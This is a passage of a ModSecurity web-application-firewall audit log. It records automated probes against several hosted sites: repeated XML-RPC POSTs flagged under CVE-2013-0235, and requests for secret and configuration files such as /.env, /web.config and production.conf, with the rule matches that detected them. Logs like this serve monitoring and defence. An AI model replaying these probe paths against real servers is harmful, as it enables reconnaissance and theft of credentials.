Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f9b7fb0c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f9b7fb0c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7Zh7Qco3e4Gnif-OQjXwAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997959874042 981818 (- - -) Stopwatch2: 1749997959874042 981818; combined=2323, p1=382, p2=1565, p3=42, p4=58, p5=172, sr=103, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9b7fb0c-Z-- --5a8bc932-A-- [15/Jun/2025:20:03:20.981998 +0530] aE7ZrwG_OhOIIVz6TXRxJgAAAAA 185.177.72.204 39242 127.0.0.1 7081 --5a8bc932-B-- GET /Program.cs HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5a8bc932-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --5a8bc932-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".cs"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".cs"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/Program.cs"] [unique_id "aE7ZrwG_OhOIIVz6TXRxJgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997999905457 1076597 (- - -) Stopwatch2: 1749997999905457 1076597; combined=1728, p1=343, p2=1305, p3=0, p4=0, p5=80, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5a8bc932-Z-- --77146701-A-- [15/Jun/2025:20:03:40.430730 +0530] aE7Zw10gAfK4E6yok-jSDgAAAA4 128.199.112.101 38540 127.0.0.1 7081 --77146701-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --77146701-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --77146701-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7Zw10gAfK4E6yok-jSDgAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998019441626 989182 (- - -) Stopwatch2: 1749998019441626 989182; combined=2317, p1=350, p2=1521, p3=46, p4=67, p5=203, sr=92, sw=130, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --77146701-Z-- --78635552-A-- [15/Jun/2025:20:03:44.304676 +0530] aE7Zx1rAUUBu5GmXkdkSkwAAAAM 185.177.72.204 38734 127.0.0.1 7081 --78635552-B-- GET /config/config.yml HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --78635552-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --78635552-H-- Message: Warning. Matched phrase "/config/config.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/config/config.yml"] [unique_id "aE7Zx1rAUUBu5GmXkdkSkwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998023304403 1000332 (- - -) Stopwatch2: 1749998023304403 1000332; combined=1699, p1=426, p2=1170, p3=0, p4=0, p5=102, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --78635552-Z-- --05f63804-A-- [15/Jun/2025:20:03:53.945536 +0530] aE7Z0AG_OhOIIVz6TXRxNQAAAAA 185.177.72.204 34054 127.0.0.1 7081 --05f63804-B-- GET /web.config HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --05f63804-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --05f63804-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/web.config"] [unique_id "aE7Z0AG_OhOIIVz6TXRxNQAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/web.config"] [unique_id "aE7Z0AG_OhOIIVz6TXRxNQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998032934349 1011246 (- - -) Stopwatch2: 1749998032934349 1011246; combined=2059, p1=390, p2=1538, p3=0, p4=0, p5=130, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05f63804-Z-- --955f213f-A-- [15/Jun/2025:20:04:08.834393 +0530] aE7Z4OuHo6EXLyJ3GJ1fHQAAAA8 108.198.224.248 51076 127.0.0.1 7080 --955f213f-B-- GET /.env HTTP/1.0 Host: toast.deckstory.com X-Real-IP: 108.198.224.248 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept-Encoding: gzip, deflate Accept: */* --955f213f-F-- HTTP/1.1 404 Not Found Content-Length: 265 Connection: close Content-Type: text/html; charset=iso-8859-1 --955f213f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "toast.deckstory.com"] [uri "/.env"] [unique_id "aE7Z4OuHo6EXLyJ3GJ1fHQAAAA8"] Stopwatch: 1749998048830386 4072 (- - -) Stopwatch2: 1749998048830386 4072; combined=2516, p1=505, p2=1883, p3=27, p4=34, p5=67, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --955f213f-Z-- --046bbd24-A-- [15/Jun/2025:20:04:41.035333 +0530] aE7aAED4emz4pcZ5aGTZTgAAAAE 128.199.112.101 60608 127.0.0.1 7081 --046bbd24-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --046bbd24-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --046bbd24-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7aAED4emz4pcZ5aGTZTgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998080077851 957556 (- - -) Stopwatch2: 1749998080077851 957556; combined=2535, p1=530, p2=1609, p3=34, p4=55, p5=200, sr=144, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --046bbd24-Z-- --3abfb27c-A-- [15/Jun/2025:20:04:42.017151 +0530] aE7aAV0gAfK4E6yok-jSJgAAAA4 185.177.72.204 60644 127.0.0.1 7081 --3abfb27c-B-- GET /conf/application.conf HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3abfb27c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --3abfb27c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/conf/application.conf"] [unique_id "aE7aAV0gAfK4E6yok-jSJgAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998081031095 986112 (- - -) Stopwatch2: 1749998081031095 986112; combined=2513, p1=435, p2=1972, p3=0, p4=0, p5=106, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3abfb27c-Z-- --bd1aaf52-A-- [15/Jun/2025:20:04:43.442629 +0530] aE7aAjC7Dm45DAhop9gL9QAAAAY 185.177.72.204 60710 127.0.0.1 7081 --bd1aaf52-B-- GET /conf/development.conf HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bd1aaf52-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --bd1aaf52-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/conf/development.conf"] [unique_id "aE7aAjC7Dm45DAhop9gL9QAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998082371189 1071494 (- - -) Stopwatch2: 1749998082371189 1071494; combined=1717, p1=310, p2=1325, p3=0, p4=0, p5=82, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bd1aaf52-Z-- --923e3030-A-- [15/Jun/2025:20:04:44.819012 +0530] aE7aAwG_OhOIIVz6TXRxSQAAAAA 185.177.72.204 60768 127.0.0.1 7081 --923e3030-B-- GET /conf/production.conf HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --923e3030-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --923e3030-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/conf/production.conf"] [unique_id "aE7aAwG_OhOIIVz6TXRxSQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998083774322 1044747 (- - -) Stopwatch2: 1749998083774322 1044747; combined=1756, p1=337, p2=1336, p3=0, p4=0, p5=82, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --923e3030-Z-- --e7b2ae7f-A-- [15/Jun/2025:20:05:10.682274 +0530] aE7aHZK-05zbifgH_rT29gAAAAU 185.177.72.204 48718 127.0.0.1 7081 --e7b2ae7f-B-- GET /config/sys.config HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e7b2ae7f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --e7b2ae7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/config/sys.config"] [unique_id "aE7aHZK-05zbifgH_rT29gAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998109684525 997808 (- - -) Stopwatch2: 1749998109684525 997808; combined=2035, p1=349, p2=1571, p3=0, p4=0, p5=114, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e7b2ae7f-Z-- --73304949-A-- [15/Jun/2025:20:05:12.057436 +0530] aE7aH1u1-lKBbvo2E9pTdwAAAAw 185.177.72.204 48774 127.0.0.1 7081 --73304949-B-- GET /rel/sys.config HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --73304949-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --73304949-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/rel/sys.config"] [unique_id "aE7aH1u1-lKBbvo2E9pTdwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998111018551 1038963 (- - -) Stopwatch2: 1749998111018551 1038963; combined=2687, p1=398, p2=2171, p3=0, p4=0, p5=117, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --73304949-Z-- --4fc6ed78-A-- [15/Jun/2025:20:05:41.193253 +0530] aE7aPLQco3e4Gnif-OQjtQAAABg 128.199.112.101 46684 127.0.0.1 7081 --4fc6ed78-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --4fc6ed78-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4fc6ed78-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7aPLQco3e4Gnif-OQjtQAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998140246857 946454 (- - -) Stopwatch2: 1749998140246857 946454; combined=2081, p1=322, p2=1390, p3=39, p4=59, p5=171, sr=87, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4fc6ed78-Z-- --5e0bb65f-A-- [15/Jun/2025:20:06:13.856054 +0530] aE7aXPRzj1BwdxQoarvKjwAAAAo 185.177.72.204 41920 127.0.0.1 7081 --5e0bb65f-B-- GET /.ebextensions/myconfig.config HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5e0bb65f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --5e0bb65f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/.ebextensions/myconfig.config"] [unique_id "aE7aXPRzj1BwdxQoarvKjwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998172856635 999482 (- - -) Stopwatch2: 1749998172856635 999482; combined=2138, p1=446, p2=1597, p3=0, p4=0, p5=94, sr=127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e0bb65f-Z-- --2d413802-A-- [15/Jun/2025:20:06:39.382278 +0530] aE7adl0gAfK4E6yok-jSXwAAAA4 185.177.72.204 37808 